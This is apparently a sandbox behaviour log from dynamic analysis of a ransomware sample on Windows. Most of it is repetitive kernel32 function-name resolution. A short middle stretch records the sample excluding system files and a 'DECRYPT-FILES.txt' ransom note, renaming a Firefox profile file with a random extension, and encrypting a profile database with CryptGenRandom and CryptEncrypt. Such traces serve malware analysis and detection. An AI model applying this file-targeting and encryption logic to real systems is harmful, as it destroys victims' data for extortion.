lpString1="CreateThread") returned="CreateThread" [0080.808] lstrlenA (lpString="CREATETHREAD") returned 12 [0080.809] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0080.809] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0080.809] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0080.809] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0080.809] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0080.809] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0080.809] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0080.809] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0080.809] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0080.809] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0080.809] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0080.809] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0080.809] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0080.809] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0080.809] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0080.809] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0080.809] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0080.809] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0080.809] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0080.809] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0080.809] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0080.809] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0080.809] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0080.809] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0080.809] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0080.809] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0080.809] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0080.809] lstrlenA (lpString="CTRLROUTINE") returned 11 [0080.809] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0080.809] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0080.809] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0080.809] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0080.809] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0080.809] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0080.809] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0080.810] lstrlenA (lpString="DEBUGBREAK") returned 10 [0080.810] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0080.810] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0080.810] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0080.810] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0080.810] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0080.810] lstrlenA (lpString="DECODEPOINTER") returned 13 [0080.810] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0080.810] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0080.810] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0080.810] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0080.810] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0080.810] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0080.810] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0080.810] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0080.810] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0080.810] lstrlenA (lpString="DELETEATOM") returned 10 [0080.810] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0080.810] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0080.810] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0080.810] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0080.810] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0080.810] lstrlenA (lpString="DELETEFIBER") returned 11 [0080.810] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0080.810] lstrlenA (lpString="DELETEFILEA") returned 11 [0080.810] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0080.810] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0080.810] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0080.810] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0080.810] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0080.810] lstrlenA (lpString="DELETEFILEW") returned 11 [0080.810] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0080.810] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0080.810] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0080.810] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0080.810] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0080.811] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0080.811] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0080.811] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0080.811] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0080.811] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0080.811] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0080.811] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0080.811] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0080.811] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0080.811] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0080.811] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0080.811] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0080.811] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0080.811] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0080.811] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0080.811] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0080.811] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0080.811] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0080.811] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0080.811] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0080.811] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0080.811] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0080.811] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0080.811] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0080.811] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0080.811] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0080.811] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0080.811] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0080.811] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0080.811] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0080.811] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0080.811] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0080.811] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0080.811] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0080.811] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0080.811] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0080.812] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0080.812] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0080.812] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0080.812] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0080.812] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0080.812] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0080.812] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0080.812] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0080.812] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0080.812] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0080.812] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0080.812] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0080.812] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0080.812] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0080.812] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0080.812] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0080.812] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0080.812] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0080.812] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0080.812] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0080.812] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0080.812] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0080.812] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0080.812] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0080.812] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0080.812] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0080.812] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0080.813] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\compatibility.ini") returned 105 [0080.813] wsprintfW (in: param_1=0x3f2d4b4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\compatibility.ini.h4wDq") returned 111 [0080.813] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\compatibility.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\compatibility.ini"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\compatibility.ini.h4wDq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\compatibility.ini.h4wdq"), dwFlags=0x0) returned 1 [0080.813] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.813] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.814] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.814] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb5e8ce50, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb5e8ce50, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb639bd10, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x38000, dwReserved0=0x0, dwReserved1=0x0, cFileName="content-prefs.sqlite", cAlternateFileName="CONTEN~1.SQL")) returned 1 [0080.814] lstrcmpiW (lpString1="content-prefs.sqlite", lpString2="DECRYPT-FILES.txt") returned -1 [0080.814] lstrcmpiW (lpString1="content-prefs.sqlite", lpString2="autorun.inf") returned 1 [0080.814] lstrcmpiW (lpString1="content-prefs.sqlite", lpString2="boot.ini") returned 1 [0080.814] lstrcmpiW (lpString1="content-prefs.sqlite", lpString2="desktop.ini") returned -1 [0080.814] lstrcmpiW (lpString1="content-prefs.sqlite", lpString2="ntuser.dat") returned -1 [0080.814] lstrcmpiW (lpString1="content-prefs.sqlite", lpString2="iconcache.db") returned -1 [0080.814] lstrcmpiW (lpString1="content-prefs.sqlite", lpString2="bootsect.bak") returned 1 [0080.814] lstrcmpiW (lpString1="content-prefs.sqlite", lpString2="ntuser.dat.log") returned -1 [0080.814] lstrcmpiW (lpString1="content-prefs.sqlite", lpString2="thumbs.db") returned -1 [0080.814] lstrcmpiW (lpString1="content-prefs.sqlite", lpString2="Bootfont.bin") returned 1 [0080.814] lstrlenW (lpString="content-prefs.sqlite") returned 20 [0080.814] lstrcmpiW (lpString1="sqlite", lpString2="lnk") returned 1 [0080.814] lstrcmpiW (lpString1="sqlite", lpString2="exe") returned 1 [0080.814] lstrcmpiW (lpString1="sqlite", lpString2="sys") returned -1 [0080.814] lstrcmpiW (lpString1="sqlite", lpString2="dll") returned 1 [0080.814] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0080.814] lstrlenW (lpString="content-prefs.sqlite") returned 20 [0080.814] lstrcpyW (in: lpString1=0x3f2dcb4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0080.814] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="content-prefs.sqlite" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\content-prefs.sqlite") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\content-prefs.sqlite" [0080.814] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0080.815] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\content-prefs.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\content-prefs.sqlite"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x460 [0080.815] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x3f2d480 | out: lpFileSize=0x3f2d480*=229376) returned 1 [0080.815] CreateFileMappingW (hFile=0x460, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x464 [0080.816] MapViewOfFile (hFileMappingObject=0x464, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x12a0000 [0080.816] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0080.816] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0080.816] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0080.818] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfc0000*, pdwDataLen=0x3f2d3e8*=0x28, dwBufLen=0x100 | out: pbData=0xfc0000*, pdwDataLen=0x3f2d3e8*=0x100) returned 1 [0080.818] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0080.824] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.824] UnmapViewOfFile (lpBaseAddress=0x12a0000) returned 1 [0080.826] CloseHandle (hObject=0x464) returned 1 [0080.826] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.826] WriteFile (in: hFile=0x460, lpBuffer=0xfc0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d408, lpOverlapped=0x0 | out: lpBuffer=0xfc0000*, lpNumberOfBytesWritten=0x3f2d408*=0x108, lpOverlapped=0x0) returned 1 [0080.827] CloseHandle (hObject=0x0) returned 0 [0080.827] CloseHandle (hObject=0x460) returned 1 [0080.827] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.828] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.828] GetTickCount () returned 0x114cb0d [0080.828] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0080.828] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0080.828] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0080.828] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0080.829] lstrlenA (lpString="kernel32.dll") returned 12 [0080.829] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0080.829] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0080.829] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0080.829] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0080.829] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0080.829] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0080.829] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0080.829] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0080.829] lstrlenA (lpString="ADDATOMA") returned 8 [0080.829] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0080.829] lstrlenA (lpString="ADDATOMW") returned 8 [0080.829] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0080.829] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0080.829] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0080.829] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0080.829] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0080.829] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0080.829] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0080.829] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0080.829] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0080.829] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0080.829] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0080.830] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0080.830] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0080.830] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0080.830] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0080.830] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0080.830] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0080.830] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0080.830] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0080.830] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0080.830] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0080.830] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0080.830] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0080.830] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0080.830] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0080.830] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0080.830] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0080.830] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0080.830] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryFinished" | out: 